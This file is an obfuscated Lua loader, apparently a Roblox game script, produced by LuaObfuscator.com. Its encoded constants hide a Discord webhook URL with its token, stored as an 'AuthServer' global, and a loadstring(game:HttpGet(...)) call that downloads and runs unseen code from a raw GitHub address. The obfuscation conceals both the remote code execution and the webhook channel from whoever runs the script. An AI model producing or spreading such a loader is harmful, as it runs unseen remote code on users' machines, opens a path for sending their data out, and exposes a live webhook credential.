--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=getfenv or function()return _ENV;end;local v9=setmetatable;local v10=pcall;local v11=select;local v12=unpack or table.unpack;local v13=tonumber;local function v14(v15,v16,...)local v17=1;local v18;v15=v4(v3(v15,5),"..",function(v29)if (v1(v29,2)==79) then local v63=0;while true do if (v63==0) then v18=v0(v3(v29,1,1));return "";end end else local v64=0;local v65;while true do if (v64==0) then v65=v2(v0(v29,16));if v18 then local v93=0;local v94;while true do if (v93==1) then return v94;end if (v93==0) then v94=v5(v65,v18);v18=nil;v93=1;end end else return v65;end break;end end end end);local function v19(v30,v31,v32)if v32 then local v66=(2745 -862) -(563 + 1320);local v67;while true do if (v66==(0 + 0)) then v67=(v30/((6 -4)^(v31-(2 -1))))%((3 -1)^(((v32-(1 -0)) -(v31-(1 -0))) + (1111 -(474 + 636))));return v67-(v67%(1 + 0));end end else local v68=(2 + (1072 -(584 + 488)))^(v31-(1 + 0));return (((v30%(v68 + v68))>=v68) and (2 -1)) or (0 + 0);end end local function v20()local v37=295 -(17 + 278);local v38;while true do if (v37==(3 -(1737 -(910 + 825)))) then return v38;end if (v37==(0 + 0)) then v38=v1(v15,v17,v17);v17=v17 + (1258 -(659 + 598));v37=1 + 0;end end end local function v21()local v39,v40=v1(v15,v17,v17 + 1 + 1);v17=v17 + 1 + 1;return (v40 * (2012 -(485 + 1271))) + v39;end local function v22()local v41=(0 -0) + 0;local v42;local v43;local v44;local v45;while true do if (v41==(610 -(444 + 166))) then v42,v43,v44,v45=v1(v15,v17,v17 + (8 -5));v17=v17 + (1338 -(1191 + (495 -352)));v41=155 -(50 + 104);end if (v41==((101 + 45) -(84 + 61))) then return (v45 * (16777826 -(327 + 121 + 162))) + (v44 * ((40588 -(18 + 68)) + 25034)) + (v43 * (171 + 85)) + v42;end end end local function v23()local v46=0 + 0;local v47;local v48;while true do if (v46==(0 -0)) then v47=v22();v48=v22();v46=2 -1;end if (v46==((1848 -(1280 + 567)) + 0)) then return (( -(8 -6) * v19(v48,1167 -(800 + 335))) + (1 -0)) * (2^(v19(v48,58 -37,31) -(2360 -1337))) * ((((v19(v48,1575 -(263 + 222 + 1089),712 -(348 + 344)) * (2^(1392 -(238 + 1122)))) + v47)/((2 -0)^(85 -33))) + (1 -0));end end end local function v24(v33)local v49=0 + 0;local v50;local v51;while true do if (v49==3) then return v6(v51);end if ((1 + (789 -(196 + 593)))==v49) then v50=v3(v15,v17,(v17 + v33) -(1369 -(1179 + 189)));v17=v17 + v33;v49=4 -2;end if (v49==(4 -(1962 -(1394 + 566)))) then v51={};for v74=1568 -(455 + 1112), #v50 do v51[v74]=v2(v1(v3(v50,v74,v74)));end v49=1855 -(8 + 1844);end if (v49==((151 -(130 + 21)) + 0)) then v50=nil;if  not v33 then v33=v22();if (v33==(0 -(0 + 0))) then return "";end end v49=1766 -(316 + 1449);end end end local v25=v22;local function v26(...)return {...},v11("#",...);end local function v27()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v52==2) then v57=nil;v58=nil;v52=486 -(416 + 67);end if ((2 + 1)==v52) then v59=nil;while true do local v76=723 -(215 + 508);while true do if (v76==(1782 -(1059 + 723))) then if (v53==1) then local v99=0 + 0;while true do if (v99==(2 -1)) then for v104=4 -3,v58 do local v105=0;local v106;local v107;local v108;local v109;while true do if (v105~=(0 -0)) then else local v113=760 -(36 + 724);while true do if (v113==0) then v106=0 -0;v107=nil;v113=1;end if (v113==(1 + 0)) then v105=234 -(171 + 62);break;end end end if (v105==2) then while true do if (v106~=(918 -(887 + 31))) then else local v115=0 + 0;while true do if (v115~=0) then else v107=0 -0;v108=nil;v115=3 -2;end if (1==v115) then v106=1;break;end end end if (v106~=1) then else v109=nil;while true do if (1==v107) then if (v108==(1 + 0)) then v109=v20()~=0;elseif (v108==(2 + 0)) then v109=v23();elseif (v108~=(2 + 1)) then else v109=v24();end v59[v104]=v109;break;end if (v107==(100 -(83 + 17))) then local v146=0;while true do if (v146==(1 -0)) then v107=1 + 0;break;end if ((0 + 0)==v146) then local v149=0;while true do if (v149==(3 -2)) then v146=1 + 0;break;end if (v149==(0 + 0)) then v108=v20();v109=nil;v149=1439 -(875 + 563);end end end end end end break;end end break;end if (v105~=1) then else local v114=0;while true do if (v114~=(0 + 0)) then else v108=nil;v109=nil;v114=1;end if (v114==(1356 -(311 + 1044))) then v105=2;break;end end end end end v57[792 -(770 + 19)]=v20();v99=3 -1;end if (v99~=2) then else v53=2;break;end if (0==v99) then v58=v22();v59={};v99=1;end end end if (2~=v53) then else local v100=0;local v101;while true do if (v100==0) then v101=0 -0;while true do local v110=0;while true do if (v110==(0 + 0)) then if (v101==1) then for v116=1005 -(472 + 532),v22() do v56[v116]=v22();end return v57;end if (v101==0) then for v118=1,v22() do local v119=0;local v120;local v121;local v122;while true do if (v119~=1) then else v122=nil;while true do if (v120==(83 -(31 + 52))) then local v150=0 -0;local v151;while true do if (v150~=0) then else v151=0 -0;while true do if (v151~=1) then else v120=1;break;end if (v151==(1566 -(74 + 1492))) then v121=0;v122=nil;v151=1194 -(504 + 689);end end break;end end end if (v120==(1 + 0)) then while true do if (v121~=0) then else v122=v20();if (v19(v122,1,1212 -(741 + 470))~=0) then else local v165=0;local v166;local v167;local v168;local v169;while true do if (v165==2) then while true do if ((1 + 0)==v166) then local v174=1502 -(195 + 1307);local v175;while true do if (0==v174) then v175=1883 -(1069 + 814);while true do if ((0 + 0)==v175) then local v184=0 + 0;while true do if (v184==(1131 -(384 + 746))) then v175=1;break;end if (v184==(0 -0)) then v169={v21(),v21(),nil,nil};if (v167==(0 + 0)) then local v191=0;local v192;while true do if (v191==0) then v192=0;while true do if (0==v192) then v169[11 -8]=v21();v169[243 -(92 + 147)]=v21();break;end end break;end end elseif (v167==1) then v169[6 -3]=v22();elseif (v167==2) then v169[3]=v22() -((171 -(147 + 22))^(7 + 9));elseif (v167==(8 -5)) then local v197=16 -(11 + 5);local v198;local v199;while true do if (v197==(1158 -(646 + 512))) then v198=0 -0;v199=nil;v197=1;end if (v197~=(483 -(199 + 283))) then else while true do if (v198~=0) then else v199=0;while true do if (v199==0) then v169[3]=v22() -((1573 -(475 + 1096))^16);v169[7 -3]=v21();break;end end break;end end break;end end end v184=1;end end end if (v175==1) then v166=2;break;end end break;end end end if (v166==2) then local v176=0 + 0;local v177;while true do if (v176~=0) then else v177=1048 -(275 + 773);while true do if (v177==(0 + 0)) then if (v19(v168,1,1 + 0)==(2 -1)) then v169[2]=v59[v169[1 + 1]];end if (v19(v168,2 + 0,1091 -(405 + 684))==(37 -(26 + 10))) then v169[5 -2]=v59[v169[2 + 1]];end v177=1 + 0;end if ((1 + 0)==v177) then v166=3;break;end end break;end end end if (v166~=0) then else local v178=0 + 0;local v179;while true do if ((0 + 0)==v178) then v179=0;while true do if (v179~=(333 -(162 + 171))) then else local v185=0;while true do if (v185~=(953 -(277 + 676))) then else local v190=0;while true do if (v190~=1) then else v185=1 + 0;break;end if (v190==0) then v167=v19(v122,2,3);v168=v19(v122,9 -5,14 -8);v190=1 + 0;end end end if (v185~=(1 + 0)) then else v179=1;break;end end end if (v179==1) then v166=1 + 0;break;end end break;end end end if (v166==3) then if (v19(v168,3,3)==(2 -1)) then v169[4]=v59[v169[4 + 0]];end v54[v118]=v169;break;end end break;end if (v165==(2 -1)) then local v170=1616 -(1410 + 206);while true do if ((1393 -(1303 + 89))==v170) then v165=5 -3;break;end if (v170~=(0 + 0)) then else local v181=0;while true do if (v181~=0) then else v168=nil;v169=nil;v181=1;end if (v181==1) then v170=436 -(180 + 255);break;end end end end end if (v165~=(0 + 0)) then else local v171=0 -0;while true do if (v171==(362 -(348 + 13))) then v165=1;break;end if (v171==(0 + 0)) then v166=989 -(112 + 877);v167=nil;v171=1 + 0;end end end end end break;end end break;end end break;end if (v119==(0 + 0)) then v120=0;v121=nil;v119=1 + 0;end end end for v123=1,v22() do v55[v123-(1 + 0)]=v27();end v101=1;end break;end end end break;end end end v76=1 + 0;end if (v76~=1) then else if (v53==(1458 -(1007 + 451))) then local v102=0 -0;while true do if (v102==2) then v53=1;break;end if (v102~=0) then else v54={};v55={};v102=4 -3;end if (v102~=(1 -0)) then else v56={};v57={v54,v55,nil,v56};v102=1 + 1;end end end break;end end end break;end if (v52~=(0 + 0)) then else v53=0 -0;v54=nil;v52=192 -(86 + 105);end if (v52==(1 + 0)) then v55=nil;v56=nil;v52=1534 -(960 + 572);end end end local function v28(v34,v35,v36)local v60=v34[1];local v61=v34[2];local v62=v34[3];return function(...)local v69=1;local v70= -1;local v71={...};local v72=v11("#",...) -1;local function v73()local v77=v60;local v78=v61;local v79=v62;local v80=v26;local v81={};local v82={};local v83={};for v89=0 + 0,v72 do if ((v89>=v79) or ((2775 -(3045 -(1165 + 67)))>(10739 -5906))) then v81[v89-v79]=v71[v89 + (3 -2)];else v83[v89]=v71[v89 + 1 + (0 -0)];end end local v84=(v72-v79) + (802 -(474 + 327));local v85;local v86;while true do local v90=955 -(804 + 151);local v91;local v92;while true do if ((v90==(1483 -(660 + 822))) or ((3335 -(82 + 68))>=(4119 + 670))) then while true do if (((0 + 0)==v91) or ((2358 + 947)>4516)) then v92=0 -0;while true do if ((v92==0) or (3375<=(17 + 1431))) then local v111=0 + 0;local v112;while true do if (((0 + 0)==v111) or ((5961 -(1116 + 628))==(9998 -6564))) then v112=0;while true do if (((27 + 14)<(4134 -(3068 -(330 + 757)))) and (v112==(402 -(181 + 221)))) then local v125=0 + 0;while true do if ((v125==(1 + 0 + 0)) or ((1882 -(27 + 5))<(1846 -(227 + 103)))) then v112=100 -(17 + 82);break;end if ((2308<=(5717 -(985 + 919))) and (v125==(0 -(0 + 0)))) then v85=v77[v69];v86=v85[1 -(0 -0)];v125=2 -1;end end end if (((1 + 0)==v112) or ((4567 -(384 + 161))<(1824 + 81))) then v92=960 -(723 + 236);break;end end break;end end end if (((6991 -4396)==(3162 -(275 + 292))) and ((956 -((985 -767) + 737))==v92)) then if ((((6742 -4407) -(962 + 259))<(4749 -(1597 + 372))) and (v86<=((14 -11) + 0))) then if ((v86<=(1 -0)) or ((5040 -2147)<((5830 -(366 + 980)) -(1164 + 679)))) then if (((3142 -1016)<=((26980 -16485) -6752)) and (v86>(1719 -(271 + 1448)))) then local v126=0;local v127;local v128;while true do if ((v126==(0 + 0)) or ((4347 -(880 + 2113))>(18639 -(16360 -(532 + 1244))))) then v127=761 -(731 + 30);v128=nil;v126=1 + 0;end if ((v126==((2 + 0) -1)) or ((12727 -7938)==((2186 -(5 + 329)) -(571 + 25)))) then while true do if ((v127==(0 -(0 -0))) or ((6951 -3350)>(1735 + (3520 -932)))) then v128=v85[2 + 0];v83[v128]=v83[v128](v12(v83,v128 + 1 + 0,v70));break;end end break;end end else do return;end end elseif ((v86>((2490 -1019) -(660 + 809))) or ((1346 -((1619 -(453 + 670)) + 293))>=(5616 -(620 + 903)))) then v83[v85[3 -1]]();else local v129=1795 -(772 + 9 + 1014);local v130;local v131;local v132;while true do if ((v129==(960 -(294 + 665))) or (674==(3426 -((1317 -(887 + 319)) + 58)))) then v132=nil;while true do if (((1 -0)==v130) or ((710 + 773)==((1526 -506) + 1108))) then v83[v131 + 1]=v132;v83[v131]=v132[v85[4]];break;end if (((0 + (665 -(127 + 538)))==v130) or (((3961 -3096) + 2172)>(5474 -(1279 + 182)))) then local v157=0 -0;while true do if (((1283 -(131 + 573))<=(5480 -(506 + 74))) and (v157==(2 -1))) then v130=1 -0;break;end if ((v157==(702 -(256 + 446))) or ((550 -131)>(4440 -(28 + 50)))) then v131=v85[471 -(134 + 335)];v132=v83[v85[462 -(218 + 241)]];v157=1274 -(71 + 1202);end end end end break;end if ((2187<(5223 -((1797 -(96 + 1321)) + 308))) and (v129==(634 -(177 + 457)))) then v130=0 + 0;v131=nil;v129=1616 -(192 + 1423);end end end elseif ((v86<=(1166 -(982 + 179))) or (((7839 -5187) -(378 + 113))>(3089 + 1771))) then if ((v86==((4 -1) + 1)) or ((3753 -(198 + 1799))==(1460 -1110))) then v83[v85[769 -(318 + 449)]][v85[11 -8]]=v85[1 + 3];else local v135=(0 + 0) -0;local v136;local v137;local v138;local v139;local v140;while true do if ((v135==(0 -0)) or ((1416 -((792 -575) + 745))<=(549 -(40 + 112)))) then v136=0 + 0;v137=nil;v135=1 + 0;end if ((v135==(1 + 0)) or ((605 + 114)>(4265 -1470))) then v138=nil;v139=nil;v135=2 -0;end if ((v135==(2 + 0)) or (4411<=(2803 -2122))) then v140=nil;while true do if ((((3788 -(1094 + 119)) -(288 + 802))==(1536 -(44 + 7))) and ((677 -(327 + 350))==v136)) then local v158=(0 + 0) -0;while true do if (((4353 -(126 + 11 + 65))>(3385 -(357 + (2342 -(367 + 815))))) and ((1 + 0)==v158)) then v136=1 + 0;break;end if ((v158==(0 + 0)) or ((1759 + 2592)<=(4122 -(758 + 980)))) then v137=v85[1 + 1];v138,v139=v80(v83[v137](v12(v83,v137 + (194 -(65 + 128)),v85[3 -(1233 -(290 + 943))])));v158=1;end end end if ((v136==(2 -1)) or ((302 + 336)>=((7434 -(794 + 275)) -(1344 + (165 -119))))) then v70=(v139 + v137) -(796 -(674 + 121));v140=0 -0;v136=493 -(142 + 349);end if ((v136==(7 -5)) or ((1585 + 1098)>=(12718 -(9476 -(456 + 1252))))) then for v159=v137,v70 do local v160=0 + 0 + 0;local v161;while true do if ((v160==(0 -0)) or ((938 + 3075)==(2697 -(801 + 1083)))) then v161=1206 -(94 + 1112);while true do if (((1554 -(201 + 1177))<(530 + 2404)) and (v161==(0 -0))) then v140=v140 + 1 + (0 -0);v83[v159]=v138[v140];break;end end break;end end end break;end end break;end end end elseif ((v86>(5 + 1)) or ((3027 -(565 + 1378))>(3371 -1292))) then v83[v85[1 + (1 -0)]]=v85[12 -(14 -5)];else v83[v85[3 -1]]=v36[v85[3 + 0]];end v69=v69 + (1974 -(128 + 1364 + 481));break;end end break;end end break;end if (((928 -672)<=(4905 -2521)) and (v90==(973 -(312 + 608 + 53)))) then v91=1175 -(84 + 1091);v92=nil;v90=1 + 0;end end end end A,B=v26(v10(v73));if  not A[1] then local v87=0;local v88;while true do if (v87==0) then v88=v34[4][v69] or "?";error("Script error at ["   .. v88   .. "]:"   .. A[2]);break;end end else return v12(A,2,B);end end;end return v28(v27(),{},v16)(...);end v14("LOL!093O0003023O005F472O033O004B6579030C3O00325459676E696D61675F7858030A3O004175746853657276657203793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31302O3630392O3135343237393531343239322F5942596F3459304F4A5F445A51724E5470564641525A4F4C3553654E7874644F6B573141744B626457335944435A7843772D5F54645F616776545A555974714256695F6F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7073782D536372697074732F70737873632F6D61696E2F7363726970742E6C7561000C3O0012063O00013O0030043O000200030012063O00013O0030043O000400050012063O00063O001206000100073O002002000100010008001207000300094O0005000100034O00015O00022O00033O000100016O00017O000C3O00023O00023O00033O00033O00043O00043O00043O00043O00043O00043O00043O00053O00",v8(),...);end
